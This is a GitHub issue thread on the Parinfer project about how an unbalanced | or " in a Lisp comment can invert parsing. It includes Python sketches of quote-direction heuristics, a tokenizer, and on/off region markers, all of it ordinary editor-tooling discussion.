"Dangerous quotes" extend to |? #213

Open
gilch opened this issue Aug 26, 2024 · 3 comments

@gilch

gilch commented Aug 26, 2024

Unbalanced | inside a comment:

;; |
(defun foo (
  2

Maybe similar to the "dangerous quotes" problem with an unbalanced " in a comment, but I think this one could come up more often.

If so, it should at least be documented along with ".

The documentation on dangerous quotes suggests that this wouldn't be an issue if we could tell start quotes from end quotes. It's not 100% reliable, but you can usually tell whether a " starts or ends a string from the immediately surrounding characters. A (" or a " preceded by whitespace probably starts a string, while a ") or a " followed by whitespace probably ends it. On the other hand, | can occur inside of symbols, so it's not as easy, but again, they're usually on the outside, so a (| or a | preceded by whitespace probably starts a symbol, while a |) or a | followed by whitespace probably ends it. You could tally the whole file and see whether most of the quotes that should be start quotes (by position) look like start quotes, and whether most of the end quotes look like end quotes. If it's the reverse, you're probably in a temporary inverted situation. Another heuristic might be the relative length of code vs strings.
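A rough sketch of that last heuristic (relative length of code vs strings), in Python. The function names are made up for illustration, the escape handling is deliberately naive, and nothing here is part of Parinfer. It measures how much of the text would sit inside strings under each starting assumption and treats the reading with less string content as the more plausible one.

```python
def string_fraction(text, starts_inside=False):
    """Fraction of characters inside "..." given the assumed starting state.

    Naive: a quote counts as escaped only if directly preceded by a backslash.
    """
    inside, count, prev = starts_inside, 0, ""
    for ch in text:
        if ch == '"' and prev != "\\":
            inside = not inside
        elif inside:
            count += 1
        prev = ch
    return count / len(text) if text else 0.0


def likely_inverted(text):
    """True if reading the text as 'already inside a string' yields less string content."""
    return string_fraction(text, False) > string_fraction(text, True)


normal = '(def a "x")\n(def b "y")'
print(likely_inverted(normal))            # False
print(likely_inverted('" (def b "y")'))   # True
```

This only says which reading looks more like code; a file that is mostly docstrings would fool it, so it could at best be one vote among several.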

Maybe most of the time you could get by on these heuristics, but in cases where certainty isn't as high, you could fall back to the current behavior. The user needs to know why this is happening though.

Is it possible for Parinfer to at least report the location of the dangerous " or | so the editor can highlight it? (Or does it do this already?) The Spacemacs Parinfer layer, at least, doesn't handle this very well. It just mysteriously stops working, maybe with a cryptic #<user-ptr... message that's easy to miss.

It would also be nice if there was a way to turn Parinfer off for just a section of the code. Something like a ;; Parinfer: off and ;; Parinfer: on pair. This would make it easier for the user to find problems with a binary search approach. It would also allow a dangerous " or | if the user super needs it for some reason without giving up on Parinfer for the whole file. A ;; Parinfer: skip above a top-level form could also help. It might be easier to implement.
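To make the on/off idea concrete, here is a minimal Python sketch of a preprocessor that splits a buffer into enabled and disabled regions. The marker syntax is just the one proposed above, `split_regions` and `process` are hypothetical names, and `transform` stands in for whatever actually runs Parinfer. Processing regions independently is a simplification, since real indentation inference depends on context from earlier lines.

```python
import re

# Matches comment lines such as ";; Parinfer: off" (proposed syntax, not an existing feature).
MARKER = re.compile(r"^\s*;+\s*Parinfer:\s*(on|off)\s*$", re.IGNORECASE)


def split_regions(text):
    """Split text into (enabled, lines) regions; marker lines stay in the disabled region."""
    regions, current, enabled = [], [], True
    for line in text.split("\n"):
        m = MARKER.match(line)
        state = None if m is None else (m.group(1).lower() == "on")
        if state is False and enabled:
            if current:
                regions.append((True, current))
            current, enabled = [line], False
        elif state is True and not enabled:
            current.append(line)
            regions.append((False, current))
            current, enabled = [], True
        else:
            current.append(line)
    if current:
        regions.append((enabled, current))
    return regions


def process(text, transform):
    """Apply transform only to enabled regions and leave disabled ones untouched."""
    out = []
    for enabled, lines in split_regions(text):
        chunk = "\n".join(lines)
        out.append(transform(chunk) if enabled else chunk)
    return "\n".join(out)


src = "(a\n;; Parinfer: off\n;; |\n;; Parinfer: on\n(b"
print(process(src, str.upper))
```

With `str.upper` as a stand-in transform, only `(a` and `(b` change; the region holding the stray `|` passes through verbatim.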

@shaunlebron
Collaborator

  1. Definitions: What is | and what language is this for?
  2. Heuristics for directionality: I wouldn’t know how to calculate the heuristic’s "certainty".
  3. Letting the user know: The API returns an error object with location information (see readme).
  4. Selective disabling: I’d probably implement this as a preprocessor allowing on/off but not skip.

@gilch
Author

gilch commented Sep 6, 2024

If parinfer.js doesn't have a mode or configuration for Common Lisp yet, then this is a downstream problem I'm seeing in Spacemacs. Could be in parinfer-rust-emacs or parinfer-rust-mode. This could still come up here for similar reasons if you later add Common Lisp support.

  1. I'm talking about Common Lisp specifically. | is the (default) multiple escape character, which is similar to putting a backslash before each character in a symbol that's between the || pair (i.e. foo|bar|baz is like saying foo\b\a\rbaz). Symbols can contain whitespace, ;, (, and ) this way. This means that handling probably needs to be similar to "" pairs, but e.g. foo|bar|baz should parse as one (symbol) atom, unlike foo"bar"baz, which is three (symbol string symbol). I care because of another Lisp (my Lissp/Hissp project), which is supposed to be mostly syntactically compatible with Common Lisp editors. Python users are a major audience, and a Lisp would be an easier sell if they can code using indents like they're used to in Python via Parinfer.
  2. I'm not sure how well these ideas would work in practice. The certainty level would be by counting instances over the remainder of the file (below the edit location), rather than for any one instance. For well-formed code, the odd-numbered " characters (not otherwise escaped), starting with the first, are open quotes. The even numbered are closing quotes. They'll mostly heuristically look like open and close quotes as well. In a dangerous quote situation, they can invert. See example below.
  3. This seems to be a downstream problem then; see "Need better user feedback for 'dangerous quote' situation" (justinbarclay/parinfer-rust-mode#103). But it might depend on what information is in the error.
  4. I suggested skip because I thought it might be easier to implement, not better. This is fine. Allowing a skip comment above an inner form in addition to the pair could be convenient, but doesn't add all that much.
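To illustrate point 1, here is a toy Python tokenizer showing how `|` differs from `"` at the atom level. It is a sketch under simplifying assumptions, not a Common Lisp reader: it knows only whitespace, parentheses, `;` comments, `"` strings, backslash single escapes, and `|` multiple escapes, and it ignores every other macro character.

```python
def tokenize(src):
    """Split source into parens, strings, and symbol atoms (toy reader)."""
    tokens, i, n = [], 0, len(src)
    while i < n:
        c = src[i]
        if c.isspace():
            i += 1
        elif c in "()":
            tokens.append(c)
            i += 1
        elif c == ";":
            # Comment: skip to end of line, so a | or " in here is inert.
            while i < n and src[i] != "\n":
                i += 1
        elif c == '"':
            j = i + 1
            while j < n and src[j] != '"':
                j += 2 if src[j] == "\\" else 1
            tokens.append(src[i:j + 1])
            i = j + 1
        else:
            # Symbol atom: | toggles multiple-escape mode and stays inside the atom.
            j, in_bars = i, False
            while j < n:
                ch = src[j]
                if ch == "\\":
                    j += 2
                    continue
                if ch == "|":
                    in_bars = not in_bars
                elif not in_bars and (ch.isspace() or ch in '()";'):
                    break
                j += 1
            tokens.append(src[i:j])
            i = j
    return tokens


print(tokenize("foo|bar|baz"))   # ['foo|bar|baz']
print(tokenize('foo"bar"baz'))   # ['foo', '"bar"', 'baz']
print(tokenize("(|a (b| c)"))    # ['(', '|a (b|', 'c', ')']
```

The third call shows why an unbalanced `|` is dangerous in the same way as an unbalanced `"`: between the bars, a `(` is just another symbol character.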

Example based on https://shaunlebron.github.io/parinfer/#inserting-quotes

;; User just inserted a quote character and Parinfer is about to cycle.
"┃

(def string ")))))") ;; <-- at risk!

"string"
"Another string."
;; " dangerous quote in a comment

Heuristically, based only on the immediately surrounding characters, the odds should be opening:
1 - \n"\n indeterminate
3 - )") closing
5 - g"\n closing
7 - ."\n closing
Notice they're all backwards.

The evens should be closing:
2 - ") indeterminate
4 - \n"s opening
6 - \n"A opening
8 - " indeterminate
Notice they're all backwards too.

Compare that count to just before the user's edit (previous cycle), and we can heuristically guess we're in an inverted string situation. This would be less obvious with fewer of the heuristically-correct strings below the edit, but above the dangerous quote.
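The comparison can be sketched in Python as follows. `classify` and `tally` are hypothetical names, the neighbor rules are my reading of the heuristic described here, and escapes are handled naively. The code numbers each unescaped `"`, guesses its direction from its neighbors, and counts how often that guess agrees with the expectation that odd-numbered quotes open and even-numbered quotes close.

```python
OPENERS, CLOSERS = "([{", ")]}"


def classify(text, i):
    """Guess the direction of the delimiter at text[i] from its two neighbors."""
    before = text[i - 1] if i > 0 else "\n"
    after = text[i + 1] if i + 1 < len(text) else "\n"
    left_edge = before.isspace() or before in OPENERS
    right_edge = after.isspace() or after in CLOSERS
    if left_edge and not right_edge:
        return "open"
    if right_edge and not left_edge:
        return "close"
    return "indeterminate"


def tally(text, quote='"'):
    """Return (agree, disagree) against the odd-opens, even-closes expectation."""
    agree = disagree = ordinal = 0
    for i, ch in enumerate(text):
        if ch != quote or (i > 0 and text[i - 1] == "\\"):
            continue
        ordinal += 1
        expected = "open" if ordinal % 2 == 1 else "close"
        guess = classify(text, i)
        if guess == "indeterminate":
            continue
        if guess == expected:
            agree += 1
        else:
            disagree += 1
    return agree, disagree


# The example above, without the cursor marker.
AFTER_EDIT = "\n".join([
    '"',
    '',
    '(def string ")))))") ;; <-- at risk!',
    '',
    '"string"',
    '"Another string."',
    ';; " dangerous quote in a comment',
])
BEFORE_EDIT = AFTER_EDIT[1:]  # same text minus the quote the user just typed

print(tally(BEFORE_EDIT))  # (5, 0)
print(tally(AFTER_EDIT))   # (0, 5)
```

The flip from all-agree to all-disagree between the two cycles is the signal; with only one or two determinate quotes below the edit, the counts would be too small to trust.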

Maybe there are other cases I haven't accounted for.

What should parinfer do in this situation? Maybe a separate question from the heuristics. I think inserting a " just after the edit location (after their cursor) is the most conservative change. The user can see it immediately, and it's not going to corrupt anything far away. They were probably going to type it anyway. A lot of editors automatically insert balanced pairs like this, or have an option to do it. That should be turned off for brackets handled by Parinfer, but maybe Parinfer should balance the " character like that. I can see it getting annoying in some cases, but corrupting code elsewhere is worse.

If the user really wants to invert a string, they can cut/paste into the balanced pair or something.

@gilch
Author

gilch commented Nov 19, 2024

I'm not sure my suggested heuristics here are workable. Even when they work, they might not help that much.
